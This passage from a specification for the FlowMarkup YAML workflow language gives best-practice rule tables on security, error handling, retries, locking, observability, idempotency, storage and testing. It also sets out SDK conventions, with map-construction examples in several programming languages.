| R-SEC-6 | Declare explicit `REQUEST` origin patterns in `requires:` | `INHERIT` is invalid on `requires:` — flows MUST use `REQUEST: ["api.example.com"]` or similar explicit patterns. SA-REQ-10 (ERROR). `INHERIT` is only valid on `cap:` (SA-REQ-9 warns on `cap: { REQUEST: INHERIT }`) |
| R-SEC-7 | Restrict `MAIL` capability to specific domains/addresses when possible | `MAIL: true` grants unrestricted sending. Use `MAIL: ["@example.com"]` to limit blast radius |
| R-SEC-8 | Declare explicit `EXEC` executable names in `requires:` | `INHERIT` is invalid on `requires:` — flows MUST use `EXEC: ["git", "python3"]` or similar explicit lists. SA-EXEC-8 (ERROR). `INHERIT` is only valid on `cap:` (SA-EXEC-9 warns on `cap: { EXEC: INHERIT }`) |
| R-SEC-9 | Use static lock names — avoid CEL expressions in `lock.name` | Dynamic lock names risk registry exhaustion. If dynamic names are needed, bound the cardinality |
| R-SEC-10 | Validate all user input before incorporating into XPath expressions, `exec.args`, `ssh.args`, or `storage.path` | String concatenation with untrusted input enables injection attacks (CWE-643, CWE-78, CWE-22). Use `assert:` with `matches()` against strict allowlists. SA-XML-3, SA-EXEC-11, SA-SSH-10, SA-STORAGE-18 flag these patterns |
| R-SEC-11 | Never use `htmlRaw()` on unsanitized user input in `body.html:` | `htmlRaw()` bypasses auto-escaping — user input passed through it enables XSS (CWE-79). Sanitize via a service call or use default `{{ }}` interpolation (auto-escaped). SA-MAIL-15 flags this |
| R-SEC-12 | Verify taint annotations on derived variables — engine auto-propagation covers most cases | Taint propagates automatically through CEL expressions: any expression that reads a tainted variable produces a tainted result (see [FLOWMARKUP-SECRETS.md](FLOWMARKUP-SECRETS.md) §7.4). SA-TAINT-5a (ERROR) flags variables derived from tainted sources that lose their taint due to engine-opaque operations (e.g., external service calls returning credentials). SA-TAINT-5b (ERROR) flags `$declassify` annotations applied without a recognised one-way transform. Manual `$exportable: false` or `$secret: true` annotations remain useful for values that enter the flow already tainted but are not read from `SECRET.*` (e.g., credentials returned by an action) |

Example (R-SEC-1):
```yaml
# Correct — credential via SECRET
services:
  db:
    provider: progralink.clients.db.postgres
    properties:
      host: =ENV.DB_HOST          # non-sensitive config
      port: 5432                   # literal
      password: =SECRET.db_password # credential
```

```yaml
# Wrong — credential via ENV (leakable, SHOULD-only redaction)
      password: =ENV.DB_PASSWORD
```

### 8.2 Error Handling (R-ERR-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-ERR-1 | Use `catch:` for single-step inline recovery; `try/catch` for multi-step error handling | `catch:` desugars to `try/catch` but keeps the flow flatter when only one step needs a handler. SA-ERR-7: mutually exclusive with `rollback:` |
| R-ERR-2 | Define error hierarchies with `$parent:` and catch the parent type for family handling | Avoids duplicating handlers. Catching `PaymentError` catches all descendants (`PaymentDeclinedError`, `PaymentTimeoutError`). Catch ordering: most-specific first |
| R-ERR-3 | Exclude non-retryable errors from retry via `nonRetryable:` | Retrying `ValidationError` or `AuthenticationError` wastes resources and delays failure reporting. See the retryable/non-retryable table in §4.1 |
| R-ERR-4 | Always include error context in catch handlers — log `ERROR.TYPE` and `ERROR.MESSAGE` | Bare `default: [- log: "Failed"]` loses diagnostic information. Include `"{{ERROR.TYPE}}: {{ERROR.MESSAGE}}"` |
| R-ERR-5 | Distinguish `RolledBackError` from `RollbackFailedError` in saga catch blocks | `RolledBackError` = all compensation succeeded (safe). `RollbackFailedError` = partial compensation (requires manual intervention/alert) |

### 8.3 Resilience (R-RES-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-RES-1 | Set `timeout:` on every external action step; use `defaults: { timeout: }` as a safety net | Without a timeout, a hung service blocks the flow instance indefinitely. Set action timeout < group timeout < flow timeout |
| R-RES-2 | Use `EXPONENTIAL` backoff with jitter for retry | FIXED/LINEAR retry creates thundering-herd effects when multiple instances retry simultaneously. EXPONENTIAL defaults to `jitter: true` (25%). Use `FIXED` only for known-constant recovery times |
| R-RES-3 | Use `circuitBreaker:` at GLOBAL scope to protect shared downstream services | Without a circuit breaker, all flow instances hammer a failing service, preventing recovery. Use `nonCountable:` to exclude non-indicative errors (e.g., `ValidationError`) |
| R-RES-4 | Use `rateLimit:` to enforce external API quotas — GLOBAL scope for system-wide limits, LOCAL for per-instance | `rateLimit:` with WAIT strategy queues excess requests; REJECT raises `RateLimitError` immediately |
| R-RES-5 | Store resilience policies in `const:` and reference via CEL to eliminate duplication | `const: { STD_RETRY: {maxAttempts: 3, delay: 2s, backoff: EXPONENTIAL} }` then `retry: =STD_RETRY` on each step. |

Example (R-RES-1 + R-RES-2):
```yaml
# Flow-level defaults eliminate per-step duplication
defaults:
  timeout: 30s              # R-RES-1: safety-net timeout
  retry: "3/2s/EXPONENTIAL"  # R-RES-2: exponential backoff (string shorthand)

do:
- call:
    service: payment
    operation: charge
    timeout: 10s             # override: payment is faster
    retry:                   # override: add nonRetryable to base policy
      maxAttempts: 3
      delay: 2s
      backoff: EXPONENTIAL
      nonRetryable: [PaymentDeclinedError, AuthenticationError]
    circuitBreaker:
      name: payment_charge
      threshold: 5
      window: 1m
      scope: GLOBAL
```

Note: step-level `retry:` replaces (not merges) the default, so the full policy must be restated when adding `nonRetryable:`. Alternatively, define a separate const for this specific policy.
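
The effect of jitter in R-RES-2 can be illustrated with a short Python sketch. The function name `backoff_delay` is hypothetical, and both the doubling factor and the symmetric interpretation of the 25% jitter are assumptions; the engine's exact formula is not stated in this section.

```python
import random


def backoff_delay(base_s, retry_number, jitter=0.25, rng=random):
    """Delay in seconds before the given retry (1-based), with random jitter.

    Assumptions: the nominal delay doubles per retry, and jitter spreads the
    result uniformly within plus or minus `jitter` of the nominal value.
    """
    nominal = base_s * 2 ** (retry_number - 1)
    return nominal * (1.0 + rng.uniform(-jitter, jitter))


rng = random.Random(7)  # seeded so the sketch is repeatable
delays = [backoff_delay(2.0, n, rng=rng) for n in (1, 2, 3)]
```

With a 2-second base, the nominal delays are 2, 4, and 8 seconds; jitter moves each instance's actual delay within its band, so instances that failed together do not all retry at the same moment.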

### 8.4 Data Element Scope Selection (R-SCOPE-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SCOPE-1 | Default to LOCAL scope for all flow computation | LOCAL variables are isolated per flow instance — no concurrency concerns, no cross-flow leakage |
| R-SCOPE-2 | Use `CONTEXT.*` for correlation data shared across the execution chain | CONTEXT propagates automatically to synchronous sub-flows and is deep-cloned for async sub-flows — ideal for `correlation_id`, `tenant_id`, user context |
| R-SCOPE-3 | Use `GLOBAL.*` only for system-wide shared state — always wrap read-modify-write with `lock:` | Individual GLOBAL writes are atomic but read-modify-write is NOT transactional (last-writer-wins). Without `lock:`, concurrent flows can overwrite each other |
| R-SCOPE-4 | Use `const:` for immutable flow-level values, or `$readonly: true` in `vars:`/`set:` for computed readonly values that need access to `vars:` or other `const:` names; `vars:` for mutable runtime state | `const:` for configuration, thresholds, retry policies, secret references. `$readonly: true` for computed values that should not change after assignment. `vars:` for counters, accumulators, intermediate results. `const:` and `$readonly` enforce immutability via SA-CONST-1 |

Example (R-SCOPE-3):
```yaml
# Safe read-modify-write on GLOBAL
- lock:
    name: request_counter
    scope: GLOBAL
    timeout: 5s
    do:
    - set: { GLOBAL.request_count: =GLOBAL.request_count + 1 }
```

### 8.5 Concurrency and Data Integrity (R-CONC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-CONC-1 | Use `transaction: true` for multi-step atomic operations on shared state | Transaction groups fork variable scopes — isolated working copy, atomic commit on success, automatic discard on error |
| R-CONC-2 | Prefer EXCLUSIVE locks; use SHARED only for read-heavy snapshot patterns | EXCLUSIVE provides the strongest guarantee. SHARED allows multiple concurrent readers but no writes — use for cache reads, config lookups |
| R-CONC-3 | Add `rollback:` handlers for compensating external side effects | `transaction: true` only rolls back variable state. External mutations (payments, reservations, API calls) require explicit compensation via `rollback:` |
| R-CONC-4 | Design rollback handlers to be idempotent and add retry policies to them | Rollback may be retried on failure. Use `retry:` on rollback steps. `onRollbackError: CONTINUE` permits partial compensation |
| R-CONC-5 | Acquire locks in a consistent order across all flows to avoid deadlocks | If Flow A acquires `[lock1, lock2]`, all flows must acquire in the same order. Always set `timeout:` on locks to detect deadlocks early |
| R-CONC-6 | Avoid writing the same variable from concurrent PARALLEL branches; use `lock:` or `transaction: true` if shared writes are unavoidable | Concurrent branches that write the same variable produce non-deterministic results (last-writer-wins). Use `lock:` for coordinated writes or `transaction: true` for isolated scopes |
| R-CONC-7 | **`lock:` vs `transaction:`** — use `lock:` for mutual exclusion without rollback; use `transaction: true` when you need automatic variable rollback on error | `lock:` provides serializable access (EXCLUSIVE) or concurrent reads (SHARED) but does NOT roll back variable writes on failure. `transaction: true` forks variable scopes and discards the fork on error. If you need both rollback and external compensation, combine `transaction: true` with `rollback:` handlers. Do not combine `lock:` with `transaction:` on the same scope — SA-ROLLBACK-3 warns because `transaction:` already provides serializable isolation |
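
The consistent-ordering rule in R-CONC-5 can be illustrated by analogy with Python threads. This is not FlowMarkup syntax: `acquire_all` and the lock registry are hypothetical, and sorting by name is one possible global order among many.

```python
import threading
from contextlib import ExitStack, contextmanager


@contextmanager
def acquire_all(registry, names, timeout_s=5.0):
    """Acquire the named locks in sorted-name order; release them in reverse."""
    with ExitStack() as stack:
        for name in sorted(set(names)):
            lock = registry[name]
            if not lock.acquire(timeout=timeout_s):
                # Locks taken so far are released when the ExitStack unwinds.
                raise TimeoutError(f"could not acquire {name!r} within {timeout_s}s")
            stack.callback(lock.release)
        yield


registry = {"inventory": threading.Lock(), "payment": threading.Lock()}
with acquire_all(registry, ["payment", "inventory"]):
    held = [name for name, lock in registry.items() if lock.locked()]
```

Because every caller sorts the names first, two callers that request the same locks in different orders still acquire them in the same sequence, which removes the circular wait that causes deadlock. The timeout covers the remaining case of a lock that is held too long.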

### 8.6 Execution Mode Selection (R-EXEC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-EXEC-1 | Use `PARALLEL` group mode when all branches must complete and order doesn't matter | Ideal for enrichment calls, fan-out/fan-in. Use `failPolicy: COMPLETE` to collect all results before failing |
| R-EXEC-2 | Use `RACE` mode when the first successful result is sufficient | Competing LLM providers, geo-distributed API fallback, fastest-wins patterns. RACE cancels in-flight branches non-transactionally — add `rollback:` if branches have side effects |
| R-EXEC-3 | Use `async: true` only for non-critical side effects (notifications, metrics, cache warming) — never for critical paths | Async errors are logged but not propagated; results are discarded. CONTEXT is deep-cloned (changes don't propagate back). SA-ERR-6 |
| R-EXEC-4 | In concurrent `forEach`, set `maxConcurrency` to protect downstream resources | Start with 5–10 for external APIs. Use `rateLimit:` (GLOBAL scope) to share quota across flow instances. Use `completionCondition` for "fast enough" / quorum semantics |
| R-EXEC-5 | In PARALLEL mode, never assume branch execution order — use `dependsOn:` for explicit DAG dependencies | PARALLEL branches execute concurrently; result order is non-deterministic |

Example (R-EXEC-2):
```yaml
# RACE: use fastest LLM provider
- race:
    openai:
    - call: { service: openai, operation: complete, result: response }
    anthropic:
    - call: { service: anthropic, operation: complete, result: response }
```

### 8.7 Flow Design (R-MOD-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-MOD-1 | Declare typed contracts (`input:/output:/throws:`) on every flow | Contracts are documentation, enable static analysis, and catch integration errors at load time. Use `examples:` block with one example per major code path |
| R-MOD-2 | Extract reusable logic into sub-flows via `run:` | Improves reuse, testability, and capability isolation. Sub-flows are bounded by their own `requires:` intersected with caller capabilities |
| R-MOD-3 | Move repeated CEL logic into `functions:` | Eliminates copy-paste, improves readability. Functions are pure CEL (no side effects, no recursion — SA-FN-2/SA-FN-3) |
| R-MOD-4 | Use flow-level `defaults:` to set baseline resilience policies; override at group or step level | Pyramid pattern: flow (broad baseline) → group (domain-specific) → step (exceptions). Step-level values replace (not merge) defaults |
| R-MOD-5 | Provide `examples:` block with named test cases covering happy path, error paths, and edge cases | Enables documentation, smoke testing, and contract verification. SA-EX-1..4 validate conformance |

### 8.8 Expression Hygiene (R-EXPR-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-EXPR-1 | Use `=` prefix consistently — `=expr` for CEL, plain for literals, `{{ }}` for template interpolation | SA-QUOTE-1/SA-QUOTE-2 enforce. Quotes go outside `=`: `"=expr"` is correct, `="expr"` is wrong |
| R-EXPR-2 | Use `has(SECRET.name)` to check secret existence — `SecretValue` doesn't support equality comparison | SA-SECRET-6/SA-SECRET-8. `condition: =has(SECRET.smtp_creds)` is the correct guard |
| R-EXPR-3 | Quote `switch/match:` keys that collide with YAML 1.2 reserved forms (`true`, `false`, `null`, numbers) | YAML 1.2 parses bare `true` as boolean. Write `'true':` not `true:` when string matching is intended |
| R-EXPR-4 | Use YAML block scalars (`>-`) for long CEL expressions | Multi-line CEL is more readable with `>-` line continuation than single-line strings |
| R-EXPR-5 | Use `size()` not `length()` for strings and collections in CEL | CEL uses `size()`. `length()` is not a CEL function |

### 8.9 Observability (R-OBS-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-OBS-1 | Add `_label_` to every action step and complex group | `_label_` appears in OpenTelemetry span names (`{type}:{_label_}`). Without labels, traces show generic `call[0]`, `call[1]` |
| R-OBS-2 | Add `_id_` to steps that are referenced in error handling, testing, or operational monitoring | `_id_` provides a stable programmatic identifier for step-level analysis. Use `snake_case` |
| R-OBS-3 | Log at phase boundaries — entry, critical transitions, success, and failure | Pattern: `log: "Starting payment..."` → action → `log: "Payment completed: {{payment_tx}}"`. Use WARN for retries and fallback paths, ERROR only for unrecoverable failures |
| R-OBS-4 | Include correlation ID in log messages for end-to-end tracing | `log: "Order {{order.id}} shipped ({{CONTEXT.correlation_id}})"` enables log aggregation across the execution chain |
| R-OBS-5 | Use `_meta_:` for structured operational metadata (SLO targets, team ownership, alert thresholds) | `_meta_: { slo_ms: 5000, owner: platform-team }` — machine-readable, not visible in traces but available for tooling |

### 8.10 Idempotency and Event Design (R-IDEMP-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-IDEMP-1 | Add `idempotencyKey:` to flows that perform side effects (payments, provisioning, state mutations) — omit for read-only flows | `DuplicateInvocationError` (non-retryable) on duplicate. Keys must be deterministic — SA-IDEMP-1 (ERROR) rejects `now()` in idempotency keys |
| R-IDEMP-2 | Use composite idempotency keys (3+ parts) to minimize false collisions | Bad: `=order_id` (reused across tenants). Good: `="payment:" + CONTEXT.tenant_id + ":" + order_id + ":" + amount` |
| R-IDEMP-3 | Use LOCAL scope for single-flow event coordination; CONTEXT for parent/sub-flow; GLOBAL for cross-flow signaling | Match event scope to the coordination boundary. GLOBAL is higher latency — only for inter-flow synchronization |
| R-IDEMP-4 | Define `events:` contracts with explicit `data:` schemas and include correlation IDs | `data: { order_id: =order_id, correlation_id: =CONTEXT.correlation_id }` enables event tracing |
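
The composite key in R-IDEMP-2 can be assembled mechanically when flows are built from code. The following is a minimal Python sketch, not part of any FlowMarkup SDK: `composite_key` is a hypothetical helper that only concatenates CEL operands into the string form shown in the table above. It does not evaluate CEL and does not check operand types.

```python
def composite_key(prefix: str, *operands: str) -> str:
    """Build a CEL idempotency-key expression (hypothetical helper).

    `prefix` is a literal label; each operand is a CEL sub-expression
    such as a variable path, not a Python value.
    """
    if len(operands) < 2:
        # prefix + two operands gives the 3+ parts that R-IDEMP-2 recommends
        raise ValueError("use at least two operands besides the prefix")
    parts = [f'"{prefix}:"']
    for position, operand in enumerate(operands):
        if position > 0:
            parts.append('":"')  # literal separator between operands
        parts.append(operand)
    return "=" + " + ".join(parts)


key = composite_key("payment", "CONTEXT.tenant_id", "order_id", "amount")
print(key)
```

The printed expression matches the "Good" example in R-IDEMP-2. Because every operand is a deterministic flow value, the result contains nothing like `now()` that SA-IDEMP-1 would reject.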

### 8.11 Service Configuration (R-SVC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SVC-1 | Use explicit `call:` steps (not inline CEL calls) for operations needing retry, timeout, or circuit breaker | Inline `SERVICES.db.scalar(...)` has bare execution — no resilience wrapping. Use for simple lookups/guards only |
| R-SVC-2 | Inject environment-specific service properties via `ENV.*`/`SECRET.*` to enable same flow on dev/staging/prod | `properties: { host: =ENV.DB_HOST, password: =SECRET.db_password }` — never hardcode connection details |
| R-SVC-3 | Use service remapping (`cap: { SERVICES: { db: =SERVICES.test_db } }`) on `run:` steps for test doubles and failover | Enables same sub-flow to talk to different backends without code changes |
| R-SVC-4 | Action providers MAY return credential material — flow authors MUST protect returned values | Providers MAY return credential material (tokens, connection strings, dynamic credentials). Flow authors MUST protect such values using `$secret: true` or `$exportable: false` on receiving variables. SA-TAINT-4 (ERROR) flags when a result variable receiving auth/credential output lacks taint annotation. Prefer `$secret: true` for full opacity or `$exportable: false` for values needing computation |

### 8.12 Version Migration (R-VER-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-VER-1 | Add `onVersionChange:` for long-running checkpointed flows that may be upgraded mid-execution | Handles checkpoint resume after flow definition changes. Omit for short-lived or non-checkpointed flows |
| R-VER-2 | Design migration handlers to be idempotent — checkpoint is preserved on error for retry | Reject incompatible migrations early: `throw: { condition: =MIGRATION.OLD_VERSION < 2, error: IncompatibleVersionError }` |
| R-VER-3 | Bump `version:` only on breaking changes to input/output/vars; use `documentation:` to note what changed | Enables callers to detect incompatibilities at load time |

### 8.13 Testing Strategy (R-TEST-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-TEST-1 | Use UNIT tier for business logic (fast, hermetic, all services mocked); INTEGRATION tier for service interaction contracts | UNIT tests run on developer machines. INTEGRATION tests run nightly against staging. See FLOWMARKUP-TESTING.md §1, Test tiers |
| R-TEST-2 | Provide at least one `examples:` entry per major code path (happy path, each error path, boundary conditions) | Flow-level `examples:` enable documentation, smoke tests, and contract verification |
| R-TEST-3 | Test timeout and error paths explicitly — mock services with `delay: >timeout` and error responses | Verify `TimeoutError` is thrown and caught correctly. Use virtual time to avoid real delays |
| R-TEST-4 | Use stateful mocks for flows with retry/fallback patterns — simulate initial failure then success | Validates that retry logic actually recovers. See FLOWMARKUP-TESTING.md §4.10 |

### 8.14 Storage and SSH (R-SEC-13+)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-13 | Prefer read-only STORAGE grants — use `STORAGE: { "s3://bucket/*": [get, list] }` or `STORAGE: { data: [get, list] }` instead of `STORAGE: [data]` | Grant minimum operations needed. `STORAGE: [data]` gives full access (all operations). Explicit operation lists limit blast radius |
| R-SEC-14 | Use URL-pattern restrictions for shared storage — use `STORAGE: { "s3://bucket/public/*": [get, list] }` or alias with `paths:`: `STORAGE: { data: { operations: [get], paths: ["public/*"] } }` | URL-pattern or path-prefix restrictions scope each flow's access. Without them, any flow with `get` can read any path on the backend |
| R-SEC-15 | Avoid SSH interpreters — same as R-SEC-8 for EXEC. Prefer specific executables over general-purpose interpreters in SSH allowlists | `SSH: { "server.example.com": [python3] }` effectively grants arbitrary remote code execution. SA-SSH-3 (ERROR) rejects this. Use `SSH: { "server.example.com": [deploy.sh, rsync] }` |
| R-SEC-16 | Prefer `transfer` over variable piping for large files | `transfer` uses streaming pipes and avoids memory pressure. Variable piping (`get` then `put`) materializes the entire file in flow memory |

### 8.15 Security Hardening (R-SEC-17+)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-17 | Prefer static `request.url` values; use CEL-derived URLs only with SSRF allowlists | CEL-derived URLs bypass static analysis origin validation. When dynamic URLs are necessary, configure explicit SSRF allowlists (scheme, host, port range) and rely on the engine's runtime SSRF prevention (§4.3). SA-REQ-15 flags dynamic `request.url` expressions |
| R-SEC-18 | Set `forEach.maxItems` explicitly for all user-input-driven iterations | Without `maxItems`, an attacker-controlled collection can cause the engine to iterate millions of times (CWE-770). SA-FOREACH-3 flags missing `maxItems` on user-controlled input. Default is 10,000 but explicitly setting the value documents intent and enables per-use-case tuning |
| R-SEC-19 | Use lock name prefixes scoped to the flow's domain to prevent namespace collisions | Lock names are automatically namespaced by flow ID and tenant ID (§3.21), but using descriptive domain-scoped prefixes (e.g., `payments.balance`, `inventory.stock`) improves auditability and prevents logical collisions within the same flow. SA-LOCK-10 flags user-derived lock names |
| R-SEC-20 | Prefer `mail.to` allowlists over open recipient fields for automated email steps | `MAIL: true` allows sending to any address, enabling open-relay abuse. Use `MAIL: ["@company.com"]` to restrict recipients. SA-MAIL-20 warns when recipient fields derive from user input with unrestricted MAIL capability |
| R-SEC-21 | Avoid `cap: INHERIT` — prefer explicit, minimal capability grants on `run` steps | `cap: INHERIT` forwards the caller's full capability set, violating least-privilege (CWE-250). SA-RUN-18 and SA-CAP-5 flag this. Explicit enumeration limits blast radius and makes security audits tractable |
| R-SEC-22 | Consider absolute paths in `exec.command`/`ssh.command` field values when PATH-based hijacking is a concern (capability declarations use bare names per schema) | Capability declarations (`requires.EXEC`, `cap.EXEC`) always use bare executable names (schema-enforced pattern). The `exec.command` and `ssh.command` *field values* MAY use absolute paths in environments where PATH-based hijacking is a concern (note: SA-EXEC-3 warns on path separators as a portability trade-off). Bare names are acceptable when the engine controls PATH resolution. SA-EXEC-10 and SA-SSH-3 enforce the interpreter denylist |
| R-SEC-23 | Always use `timeout:` on service calls, HTTP requests, exec, and SSH steps | Without explicit timeouts, steps can block indefinitely, consuming engine resources and potentially causing cascading failures. Set timeouts appropriate to the expected operation duration |
| R-SEC-24 | Prefer domain-restricted MAIL capability (`MAIL: ["@domain.com"]`) over `MAIL: true` | Unrestricted MAIL capability allows sending to any address, enabling open-relay abuse. Domain-restricted grants limit blast radius and align with least-privilege principles |
| R-SEC-25 | Always include `cap:` restrictions on sub-flow `run:` steps to follow least privilege | Omitting `cap:` on `run:` steps passes through the caller's full capability set. Explicit `cap:` grants document intent and limit the sub-flow's access to only what it needs |
| R-SEC-26 | Declare `events:` contracts for all flows using emit/waitFor | Event contracts enable static analysis of event type compatibility, payload schemas, and dead-letter detection. Without contracts, event-driven flows are opaque to validation |
| R-SEC-27 | Use `$format` patterns on path-type input parameters to prevent traversal | `$format` annotations on path-like inputs enable SA rules to detect potential path traversal. Without them, user-supplied paths may bypass validation |
| R-SEC-28 | Always include `integrity:` on remote flow references in production | Without `integrity:` verification, remote flow references are vulnerable to supply-chain attacks. The `integrity:` field pins the flow to a specific content hash, ensuring that the referenced flow has not been tampered with |

### 8.16 Document Store Compatibility (R-STORE-\*)

FlowMarkup's `$name` metadata convention (`$kind`, `$type`, `$format`, etc.) is structurally isolated from MongoDB and Elasticsearch operator semantics. The `$`-prefixed keys are nested inside declaration contexts (`input:`, `vars:`, `const:`, `throws:`, `yields:`, `requires:`) and never appear at the document root or in serialized runtime state. Value Projection (§2.4) strips all metadata before checkpoint serialization — only `$text` from XML-to-MAP conversion may appear as a data key. The collision risk is further mitigated because metadata is accessed via the `meta()` CEL macro, not dot-access on `$`-prefixed properties.

| ID | Rule | Rationale |
|---|---|---|
| R-STORE-1 | Flow definitions MAY be stored as documents in MongoDB 5.0+ without modification — `$`-prefixed metadata keys are nested inside declaration contexts and do not conflict with MongoDB operators | MongoDB 5.0+ allows `$`-prefixed field names in stored documents. FlowMarkup `$` keys never appear at the document root. |
| R-STORE-2 | Engines SHOULD store the raw YAML/JSON source as a string field alongside the parsed document | `contentHash` (for `onVersionChange:`) is SHA-256 of original bytes; re-serialized documents may differ |
| R-STORE-3 | Engines MUST NOT use MongoDB Extended JSON as the serialization format for flow definitions — use standard JSON or BSON via native driver | `$type` collision: FlowMarkup uses `$type` for MIME type, Extended JSON v2 uses `$type` for BSON type wrappers. CEL-level collision is fully eliminated by the `meta()` macro approach; the remaining concern is serialization-format level only. |
| R-STORE-4 | Checkpoint `variables` map contains projected raw values only; `$`-prefixed metadata is engine-internal and MUST NOT appear in serialized state | Value Projection (§2.4) guarantees metadata stripping. `$text`, produced by XML-to-MAP conversion, is the only known `$`-prefixed key that may appear as runtime data. |
| R-STORE-5 | Flow definitions and checkpoint data MAY be indexed in Elasticsearch without modification. Use field aliases in index templates if Kibana needs `$`-prefixed field access. | Elasticsearch has no `$`-prefix restrictions; Kibana UI has cosmetic limitations with `$`-prefixed field names. |
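
Two of these rules lend themselves to a quick check. The Python sketch below is illustrative only and makes several assumptions: the function names are hypothetical, the hash is rendered as a hex string (the encoding of `contentHash` is not stated in this section), and the checkpoint is modeled as plain nested dictionaries and lists. It shows why R-STORE-2 asks for the raw source to be kept, and how an engine test might verify R-STORE-4.

```python
import hashlib
import json

# `$text` is the only `$`-prefixed runtime data key named in this section.
ALLOWED_DATA_KEYS = {"$text"}


def content_hash(raw_source: bytes) -> str:
    """SHA-256 over the original bytes (hex encoding is an assumption)."""
    return hashlib.sha256(raw_source).hexdigest()


def find_metadata_keys(value, path="variables"):
    """Return paths of `$`-prefixed keys that should not be in a checkpoint."""
    found = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = f"{path}.{key}"
            if (isinstance(key, str) and key.startswith("$")
                    and key not in ALLOWED_DATA_KEYS):
                found.append(child_path)
            found.extend(find_metadata_keys(child, child_path))
    elif isinstance(value, list):
        for index, child in enumerate(value):
            found.extend(find_metadata_keys(child, f"{path}[{index}]"))
    return found


# R-STORE-2: the same document, re-serialized, hashes differently.
raw = b'{"name": "order_flow",   "requires": {}}'  # original bytes, odd spacing kept
reserialized = json.dumps(json.loads(raw)).encode()
print(content_hash(raw) == content_hash(reserialized))  # False: whitespace differs

# R-STORE-4: metadata leaking into serialized state is reported, `$text` is not.
checkpoint_vars = {
    "order": {"id": 7, "note": {"$text": "hi"}},
    "token": {"$secret": True},
}
print(find_metadata_keys(checkpoint_vars))  # ['variables.token.$secret']
```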

### 8.17 SDK and Builder API Guidelines (R-SDK-\*)

FlowMarkup is a YAML data format — flows are authored, stored, and exchanged as YAML (or JSON) documents. SDKs in any programming language may provide construction APIs for building flow documents programmatically. This section defines cross-language conventions that ensure consistent API surfaces regardless of implementation language.

The core challenge: several directive names (`if`, `while`, `switch`, `try`, `return`, `break`, `continue`, `throw`, `yield`, `assert`, `lock`) and several sub-keys (`do`, `catch`, `finally`, `else`, `default`, `match`, `async`, `as`, `from`) collide with reserved words across Java, Python, JavaScript/TypeScript, C#, Go, Rust, Kotlin, Swift, Ruby, and/or PHP. While these are harmless as YAML string keys, they cannot be used as method or function names in most languages.

#### 8.17.1 Map Construction (Primary Pattern)

The primary SDK construction path uses nested maps (dictionaries, hash maps) with string keys. This approach has **zero keyword conflicts** in any language, maps 1:1 to YAML output, and requires no special naming conventions.

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-1 | SDKs MUST support map/dictionary-based flow construction with string keys as the primary construction API | String keys bypass all reserved-word conflicts. Works identically in every language. |
| R-SDK-2 | Map construction output MUST serialize to spec-compliant YAML or JSON without post-processing | The map structure IS the flow — no intermediate representation needed |

**Examples across languages:**

Python:
```python
flow = {
    "name": "order_flow",
    "requires": {},
    "do": [
        {"try": {
            "do": [
                {"if": {
                    "condition": "=order.total > 1000",
                    "then": [{"log": "High-value order"}]
                }}
            ],
            "catch": {
                "default": [{"log": "Error: {{ERROR.MESSAGE}}"}]
            }
        }}
    ]
}
```

Java:
```java
Map<String, Object> flow = Map.of(
    "name", "order_flow",
    "requires", Map.of(),
    "do", List.of(
        Map.of("try", Map.of(
            "do", List.of(
                Map.of("if", Map.of(
                    "condition", "=order.total > 1000",
                    "then", List.of(Map.of("log", "High-value order"))
                ))
            ),
            "catch", Map.of(
                "default", List.of(Map.of("log", "Error: {{ERROR.MESSAGE}}"))
            )
        ))
    )
);
```

JavaScript/TypeScript:
```typescript
const flow = {
    name: "order_flow",
    requires: {},
    do: [
        { try: {
            do: [
                { if: {
                    condition: "=order.total > 1000",
                    then: [{ log: "High-value order" }]
                }}
            ],
            catch: {
                default: [{ log: "Error: {{ERROR.MESSAGE}}" }]
            }
        }}
    ]
};
```

Go:
```go
flow := map[string]any{
    "name": "order_flow",
    "requires": map[string]any{},
    "do": []any{
        map[string]any{"try": map[string]any{
            "do": []any{
                map[string]any{"if": map[string]any{
                    "condition": "=order.total > 1000",
                    "then": []any{map[string]any{"log": "High-value order"}},
                }},
            },
            "catch": map[string]any{
                "default": []any{map[string]any{"log": "Error: {{ERROR.MESSAGE}}"}},
            },
        }},
    },
}
```

Rust:
```rust
use serde_json::json;
let flow = json!({
    "name": "order_flow",
    "requires": {},
    "do": [
        {"try": {
            "do": [
                {"if": {
                    "condition": "=order.total > 1000",
                    "then": [{"log": "High-value order"}]
                }}
            ],
            "catch": {
                "default": [{"log": "Error: {{ERROR.MESSAGE}}"}]
            }
        }}
    ]
});
```
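
To illustrate R-SDK-2, the sketch below serializes a map-constructed flow straight to JSON with Python's standard `json` module and reads it back. It is a minimal example under stated assumptions: the flow content is a shortened form of the examples above, and JSON is chosen only because it needs no third-party dependency (YAML output would typically rely on a library such as PyYAML).

```python
import json

flow = {
    "name": "order_flow",
    "requires": {},
    "do": [
        {"if": {
            "condition": "=order.total > 1000",
            "then": [{"log": "High-value order"}],
        }}
    ],
}

# Serialize directly: reserved words such as "if" and "do" are ordinary string keys.
document = json.dumps(flow, indent=2)

# Round-trip to confirm that no key was renamed or dropped along the way.
assert json.loads(document) == flow
print(document)
```

No renaming or unwrapping step sits between the map and the serialized document, which is the property R-SDK-2 asks for.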

#### 8.17.2 Fluent Builder API Convention

For SDKs that provide typed, auto-completing builder APIs, the following universal naming convention avoids reserved-word conflicts in all target languages simultaneously. No language-specific escape mechanisms (backticks, `@` prefixes, trailing underscores) are permitted — a single set of names works everywhere.

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-3 | Fluent builder methods for directives whose names collide with a reserved word in any target language MUST use the `<yamlKey>Step()` naming pattern | `tryStep()`, `ifStep()`, `returnStep()` are valid identifiers in every language even though `try`, `if`, `return` are reserved |
